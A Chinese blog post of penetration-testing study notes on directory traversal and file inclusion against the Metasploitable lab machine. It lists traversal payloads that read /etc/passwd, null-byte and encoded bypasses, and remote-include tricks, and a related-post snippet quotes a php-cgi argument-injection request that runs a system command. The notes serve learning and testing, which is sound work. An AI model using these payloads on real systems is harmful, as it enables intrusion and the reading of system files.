第十三章—手动漏洞挖掘(三)

最新推荐文章于 2021-04-09 15:10:55 发布
最新推荐文章于 2021-04-09 15:10:55 发布
阅读量179 收藏
点赞数 1
分类专栏: kail
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43876557/article/details/112778589
版权

文件遍历Directory traversal / 文件包含File include

目录权限限制不严 / 文件包含

环境:metasploitable
操作:修改php配置文件,将allow_url_include修改为on,就会允许我们include其他的url地址到webapplication的相关参数里进而执行,从而导致远程文件引用这个漏洞出现。

vi /etc/php5/cgi/php.ini
#重启apache,重启后,有漏洞的配置才会生效
/etc/init.d/apache2 restart

对于?page=a.php、?homeb.html、?file=content这种特征的一定要特别注意,可能存在有文件包含漏洞。
我们可以看到如图中url,就很可疑,我们就可以去验证测试。
在这里插入图片描述

经典测试方法:

?file=../../../../etc/passwd
?page=file:///etc/passwd
?home=main.cgi
?page=http://www.a.com/php
http:///../../../../dir/file.txt

编码绕过字符过滤
"."   "%00"  #绕过文件扩展名过滤
eg:?file=a.doc%00.php #当服务器看到%00后面的内容就不会看了

通过验证,我们可以指导这个地方存在一个文件包含漏洞:
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
不同操作系统的路径特征字符:

#类unix系统:
根目录:/
目录层级分隔符:/

#windows系统
c:\
\或/

编码:

#url编码、双层url编码
%2e%2e%2f   解码:../
%2e%2e%5c   解码:..\
%252e%252e%255c   解码:..\

#unicode/UTF-8编码
..%c0%af    解码:../
..%u2216
..%c1%9c    解码:..\

其他系统路径可能使用到的字符

file.txt...
file.txt<spaces>
file.txt""""
file.txt<<<>>><
./././file.txt
nonexistant/../file.txt
#eg:cd a 不允许,但是我没可以通过cd a/../file.txt

UNC路径

\\1.1.1.1\path\to\file.txt
小依真
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Kali Linux学习笔记—Web渗透(2-3)手动漏洞挖掘
weixin_43653897的博客
12-16 1115
手动漏洞挖掘身份认证 账号密码层面会话sessionID密码找回漏洞挖掘原则目录遍历 / 文件包含 matesploitable:172.16.2.65 kali linux:172.16.2.63 身份认证 账号密码层面 常用弱口令/基于字典的密码爆破 锁定账号 信息手机 手机号 密码错误提示信息 密码嗅探 如果有不一样,可将其右键发送到intruder加入变量 会话sessionID Xss / cookie importer SessionID in URL 嗅探 SessionID
手动渗透测试漏洞
weixin_34082789的博客
09-18 294
1. 实验环境的叙述性说明   做实验的攻击,以前我已经介绍了一篇文章Kioptrix安装和网络无人驾驶飞机配置。现在看一下虚拟机所需的两个系统:Kioptrix虚拟机和Kali Linux虚拟机。前者为靶机,后者作为攻击机使用。网络拓扑例如以下图所看到的:    2. 列举服务   首先我们使用nmap命令对网络中的机器进行扫描。输入下面命令对192.168.50.0...
第十三章手动漏洞挖掘(二)
weixin_43876557的博客
01-18 548
身份认证 面对web application的登录。
【渗透测试笔记】之【手动漏洞挖掘
AA8j的博客
07-09 317
Directory traversal/File include 目录遍历(目录权限限制不严)/文件包含漏洞 文件包含漏洞又分为LFI(本地文件包含)和RFI(远程文件包含) 漏洞特征: ?page=a.php ?home=b.html ?file=content 等 不同操作系统的路径特征字符 类Unix 根:/ 目录分级:/ Windows 根:C:\或其他 分级:\或/ 验证方法1: ?page=../../../../../../../../../../../etc/passwd 验证方法2:
【渗透测试笔记】之【手动漏洞挖掘一】
AA8j的博客
07-08 765
WIndows默认安装漏洞 利用php配置漏洞,执行php代码进而执行系统命令 (可利用Burpsuite发送POST) POST http://192.168.2.100/phpMyAdmin/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1 Host: 192.168.2.100 <?php passthru('id'); die(); ?> ...
渗透测试之手动漏洞利用
热门推荐
Jeanphorn的专栏
06-11 1万+
1. 实验环境描述  为了做漏洞利用的实验,前一片文章我已经介绍了Kioptrix靶机的安装和网络的配置。现在看一下虚拟机里必要的两个系统:Kioptrix虚拟机和Kali Linux虚拟机。前者为靶机,后者作为攻击机使用。网络拓扑如下图所示:   2. 列举服务  首先我们使用nmap命令对网络中的机器进行扫描,输入以下命令对192.168.50.0/24网段上所有的IP和TCP端口进行扫描。
php5.ini
wangschang的专栏
07-20 956
 ;**************以下这部分是php.ini-recommended中的内容******************;**********************************************************************************************;[php 5.0.4 php.ini-recommended];;;;;;;;
第八章(二)—漏洞扫描(nmap脚本使用)
weixin_43876557的博客
06-05 8670
nmap脚本 nmap扫描脚本,默认集成500多个脚本,这些脚本是有分类的,每个脚本所做的工作是不同方面的。 /usr/share/nmap/scripts/ #nmap的脚本都在该目录下存放 cat script.db less script.db | grep vuln | wc -l #查看nmap中有多少个关于弱点vuln的脚本 每个脚本后面都有一个分类categories,后面的参数内容描述了该脚本属于哪些分类 smb-vuln-ms10-061.nse 这个脚本是stuxnet蠕虫利
第八章()—漏洞扫描(openvas)
weixin_43876557的博客
06-05 5671
nmap脚本 nmap扫描脚本,默认集成500多个脚本,这些脚本是有分类的,每个脚本所做的工作是不同方面的。 /usr/share/nmap/scripts/ #nmap的脚本都在该目录下存放 cat script.db less script.db | grep vuln | wc -l #查看nmap中有多少个关于弱点vuln的脚本 每个脚本后面都有一个分类categories,后面的参数内容描述了该脚本属于哪些分类 smb-vuln-ms10-061.nse 这个脚本是stuxnet蠕虫利
第十三章——Burpsuite二(Dashboard、Intruder)
weixin_43876557的博客
09-16 3091
Burpsuite spider
kail教程(一)——vmware安装kail
weixin_43876557的博客
02-24 2580
1.进入安装引导页,该选项是带有图形界面。 2.选择语言为中文(简体) 3.国家默认为中国 4.键盘默认为汉语键位 5.等待进度 6.配置系统主机名 7.此步域名不填写 8.配置root用户和密码 9.等待进度自动配置时钟 10.磁盘配置使用整个磁盘 11.磁盘分区格盘写入确认 12.磁盘分区方案默认选择第一项,初学都建议这个选项 13.此步直接结束分区设定 14.同意磁盘分区操作...
第七章(八)—主动信息收集—SNMP扫描(onesixtyone、snmpwalk、snmpcheck)
weixin_43876557的博客
05-27 2293
SNMP 1.概述 SNMP SNMP叫做简单网络管理协议,他的通信走的是UDP的161、162。SNMP的服务端,也就是信息被查询的被管理端使用的是UDP的161端口,客户端使用的是162端口。 和DHCP协议有点像,DHCP也是基于UDP之上的应用层的协议,DHCP使用的是67、68,服务端使用的是67,客户端使用的是68。 SNMP是网络管理员配置起来最最容易疏漏的一项服务。 当你的网络稍微有点规模的时候,通过人工去进行网络设备运行情况的监控的话,效率会低,所以需要引入基于SNMP协议的一些监控机制,
第八章(一)—漏洞扫描(基本概念)
weixin_43876557的博客
06-01 2185
基于端口服务扫描结果版本信息(速度慢) 搜索已公开的漏洞数据库(数量大) 使用弱点扫描器实现漏洞管理
kail教程(七)—基本工具(nc、ncat)
weixin_43876557的博客
02-27 1968
常用工具 经常使用且功能强大,安全从业者必不可少的帮手。 Nc/ncat 是网络工具中被成为瑞士军刀,特点:体积小巧,功能强大。 跨平台,有windows也有linux的。 可以做的事情: telnet/获取banner信息:NC比telnet强大 传输文本信息:举例:它可以做聊天工具 传输文件/目录 加密传输文件:默认传输文本文件是不加密的 远程控制/木马 加密所有流量 流媒体服务器 远程克隆...
第七章(九)—主动信息收集—SMB扫描(nmap、nbtscan、enum4linux)
weixin_43876557的博客
05-27 1507
SMB扫描 SMB:Server Message Block协议。 SMB协议最早由微软开发,是一个特有的协议,后来由于SMB使用范围越来越广,Linux也去兼容了SMB协议,可以进行一些跨系统协议的互通。 他是安全问题最多的协议 实现复杂 微软系统默认开放 文件共享,是通过SMB来实现的 空会话未身份认证访问(SMB1) SMB1.0的漏洞,即不用账号密码,也可以跟目标系统建立一个空连接,基于这个空连接,可以获取到目标系统的密码策略、用户名、组名、机器名、用户、组SID。 注:windows默认开放1
第七章(六)—主动信息收集—服务扫描(Banner、服务识别)
weixin_43876557的博客
05-26 1439
服务扫描 找到了活着的ip、找到了开放的端口,下一阶段就是去识别开放端口上运行的应用。 识别开放端口上运行的应用 根据识别到的应用程序软件信息、版本,我们可以到相应的软件官方网站上去查找,如果是老版本的,可以去官方网站查找公布出来的老版本上存在的一些漏洞,这些漏洞就可以被利用,找到这些信息,就可以有针对性的找到利用代码,自己去发掘他的利用方式,可以用逆向工程、模糊测试的方式去发现漏洞及利用方法。 识别目标操作系统 有些操作系统自带的服务上面也会存在一些漏洞。识别他是windows还是linux,版本是
第十三章手动漏洞挖掘(一)
weixin_43876557的博客
01-11 1206
手动漏洞挖掘(一)
kail教程(八)—基本工具Wireshark
weixin_43876557的博客
03-02 1083
Wireshark 抓包嗅探、协议分析。 必备技能! 从一台电脑传到另外一台电脑所有数据包在网线中传输的时候,可以通过Wireshark对他进行抓包,将所有的内容信息提取出来,可以对他包里面传输的协议内容进行分析。 原理: Wireshark本身是一个对数据包的分析软件,实际对数据包抓包过程使用的组件并不是Wireshark本身,它使用的组件是: Libpcap —— Linux Winpcap...
第十三章手动漏洞挖掘(十)——XSS(
weixin_43876557的博客
04-09 1072
存储型XSS 1. 概述 反射型xss和存储型xss的区别是: 反射型xss需要一系列的社会工程学等各种欺骗方式诱使别人点击你发送给他的连接地址,利用起来较麻烦。 存储型xss漏洞利用之后造成的威胁性更大,利用难度也较容易一些。 存储型xss,利用代码长期存储在服务器端。渗透测试者一次性发起漏洞利用代码后,利用代码就会注入到服务器存在漏洞的页面,之后每当有人访问该页面,都会从服务器下载这段攻击性的代码脚本,在本地浏览器中执行。只要渗透测试者攻击后开着主机侦听端口等待有人访问该网页,就会像钓鱼一样上钩,客户端
理解XSS漏洞:挖掘、防护与分类解析
"XSS漏洞挖掘与安全防护" XSS(Cross Site Scripting)漏洞是网络安全领域的一个重要话题,尤其在Web应用中极为常见。这种漏洞允许攻击者在用户浏览网页时注入并执行恶意脚本,进而对用户的安全造成威胁。XSS攻击的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值